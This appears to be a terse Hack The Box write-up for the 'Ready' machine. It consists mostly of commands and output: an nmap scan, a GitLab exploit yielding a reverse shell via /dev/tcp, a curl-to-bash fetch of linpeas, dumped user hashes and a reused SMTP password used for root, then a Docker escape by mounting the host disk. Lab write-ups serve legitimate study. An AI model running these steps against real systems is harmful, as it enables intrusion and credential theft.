ready
Introduction:
Recon
1Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-18 20:57 EDT
2Nmap scan report for 10.10.10.220
3Host is up (0.15s latency).
4Not shown: 998 closed ports
5PORT STATE SERVICE VERSION
622/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
7| ssh-hostkey:
8| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
9| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
10|_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
115080/tcp open http nginx
12| http-robots.txt: 53 disallowed entries (15 shown)
13| / /autocomplete/users /search /api /admin /profile
14| /dashboard /projects/new /groups/new /groups/*/edit /users /help
15|_/s/ /snippets/new /snippets/*/edit
16|_http-title: GitLab is not responding (502)
17No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
18TCP/IP fingerprint:
19OS:SCAN(V=7.91%E=4%D=3/18%OT=22%CT=1%CU=37999%PV=Y%DS=2%DC=I%G=Y%TM=6053F72
20OS:4%P=x86_64-pc-linux-gnu)SEQ(SP=100%GCD=1%ISR=103%TI=Z%CI=Z%TS=A)SEQ(SP=1
21OS:00%GCD=1%ISR=102%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M54DST11NW7%O2=M54DST11NW7%O
22OS:3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11NW7%O6=M54DST11)WIN(W1=FE88%W2=
23OS:FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M54DNNSN
24OS:W7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%D
25OS:F=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O
26OS:=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W
27OS:=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%R
28OS:IPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
29
30Network Distance: 2 hops
31Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
32
33OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
34Nmap done: 1 IP address (1 host up) scanned in 38.44 seconds
35
Enumeration
Exploitation
(py3) eneloop@kinetic:…/hackthebox/ready/data$ python ./49334.py -u enp -p enp12345 -g http://10.10.10.220 -l 10.10.14.22 -P 4444 [+] authenticity_token: mfG76ibP38oNhTQoB2V72QWevYDjWynGuEbqUk9wg8fKlGdIezMNJltoS+j/lllg97WORKVPwwGbFIQW7Tv3jA== [+] Creating project with random name: project4640 [+] Running Exploit [+] Exploit completed successfully! (py3) eneloop@kinetic:…/hackthebox/ready/data$
eneloop@kinetic:…/hackthebox/ready/data$ nc -lvnp 4444 listening on [any] 4444 … connect to [10.10.14.22] from (UNKNOWN) [10.10.10.220] 52862 bash -i >& /dev/tcp/10.10.14.22/4455 0>&1
eneloop@kinetic:…/hackthebox/ready/data$ nc -lvnp 4455 listening on [any] 4455 … connect to [10.10.14.22] from (UNKNOWN) [10.10.10.220] 41130 bash: cannot set terminal process group (488): Inappropriate ioctl for device bash: no job control in this shell git@gitlab:~/gitlab-rails/working$ cd /tmp cd /tmp git@gitlab:/tmp$ which curl which curl /opt/gitlab/embedded/bin/curl git@gitlab:/tmp$ curl http://10.10.14.22:8000/linpeas.sh|bash curl http://10.10.14.22:8000/linpeas.sh|bash % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 0 305k 0 0 0 0 0 0 –:–:– –:–:– –:–:– 0 Starting linpeas. Caching Writable Folders…
================================( Processes, Cron, Services, Timers & Sockets )================================ [+] Cleaned processes [i] Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes root 1 0.0 0.0 18044 2896 ? Ss 01:32 0:00 /bin/bash /assets/wrapper root 12 0.0 0.0 4388 1144 ? S 01:32 0:00 runsvdir -P /opt/gitlab/service log: …………………………………………………………………………………………………………………………………………………………………………………………………………………….
Possible private SSH keys were found! /var/opt/gitlab/gitlab-rails/etc/secrets.yml
gitlab-rails was found. Trying to dump users… {“id”=>1, “email”=>“[email protected]”, “encrypted_password”=> “$2a$10$.Kc4bwq3BqLCEzAGJVIJFeK4emNnucvAqk1vCv4Yp45yy2nmrFa.2”,
{“id”=>3, “email”=>“[email protected]”, “encrypted_password”=> “$2a$10$4vZAglOnEdNEe1SoNj1IE.RfotOt9gPnOXBEihjd7QBhsUmgmAdLi”, “reset_password_token”=>nil,
“id”=>2, “email”=>“[email protected]”, “encrypted_password”=> “$2a$10$NOMTXhO31vqykicMa6zj3O.F5PIyI9q/S4c.v22eMSfXNDdtpI2Mm”, “reset_password_token”=>nil, “reset_password_sent_at”=>nil, “remember_created_at”=>nil,
“id”=>4, “email”=>“[email protected]”, “encrypted_password”=> “$2a$10$7xK1UPcwvjWIo4ioCz28GeFSt.NR00AHsY2AF.gWzaWwikRVXCTXa”, “reset_password_token”=>nil, “reset_password_sent_at”=>nil,
Found /opt/backup/gitlab.rb gitlab_rails[‘smtp_password’] = “wW59U!ZKMbG9+*#h”
[+] Unexpected in root /root_pass /.dockerenv /assets /RELEASE
-rw-r–r– 1 dude dude 3771 Aug 31 2015 /home/dude/.bashrc -rw-r–r– 1 dude dude 655 May 16 2017 /home/dude/.profile
Post-exploit/PrivEsc
git@gitlab:/$ python3 -c ‘import pty; pty.spawn("/bin/bash");’ python3 -c ‘import pty; pty.spawn("/bin/bash");’ git@gitlab:/$ su - root su - root Password: wW59U!ZKMbG9+*#h
root@gitlab:~#
root@gitlab:/# fdisk -l fdisk -l Disk /dev/loop0: 55.4 MiB, 58052608 bytes, 113384 sectors Units: sectors of 1 * 512 = 512 bytes Sector size (logical/physical): 512 bytes / 512 bytes I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk /dev/loop1: 55.5 MiB, 58159104 bytes, 113592 sectors Units: sectors of 1 * 512 = 512 bytes Sector size (logical/physical): 512 bytes / 512 bytes I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk /dev/loop2: 71.3 MiB, 74797056 bytes, 146088 sectors Units: sectors of 1 * 512 = 512 bytes Sector size (logical/physical): 512 bytes / 512 bytes I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk /dev/loop3: 71.4 MiB, 74907648 bytes, 146304 sectors Units: sectors of 1 * 512 = 512 bytes Sector size (logical/physical): 512 bytes / 512 bytes I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk /dev/loop4: 31.1 MiB, 32595968 bytes, 63664 sectors Units: sectors of 1 * 512 = 512 bytes Sector size (logical/physical): 512 bytes / 512 bytes I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk /dev/loop5: 31.1 MiB, 32571392 bytes, 63616 sectors Units: sectors of 1 * 512 = 512 bytes Sector size (logical/physical): 512 bytes / 512 bytes I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk /dev/sda: 20 GiB, 21474836480 bytes, 41943040 sectors Units: sectors of 1 * 512 = 512 bytes Sector size (logical/physical): 512 bytes / 512 bytes I/O size (minimum/optimal): 512 bytes / 512 bytes Disklabel type: gpt Disk identifier: 32558524-85A4-4072-AA28-FA341BE86C2E
Device Start End Sectors Size Type /dev/sda1 2048 4095 2048 1M BIOS boot /dev/sda2 4096 37746687 37742592 18G Linux filesystem /dev/sda3 37746688 41940991 4194304 2G Linux swap
root@gitlab:/# mount /dev/sda2 /host mount /dev/sda2 /host root@gitlab:/# cd /host cd /host root@gitlab:/host# ls -l
root@gitlab:~# cd /host cd /host root@gitlab:/host# ls ls bin cdrom etc lib lib64 lost+found mnt proc run snap sys usr boot dev home lib32 libx32 media opt root sbin srv tmp var root@gitlab:/host# cd root cd root root@gitlab:/host/root# ls ls docker-gitlab ready-channel root.txt snap root@gitlab:/host/root# cat root.txt cat root.txt b7f98681505cd39066f67147b103c2b3 root@gitlab:/host/root#
Notes: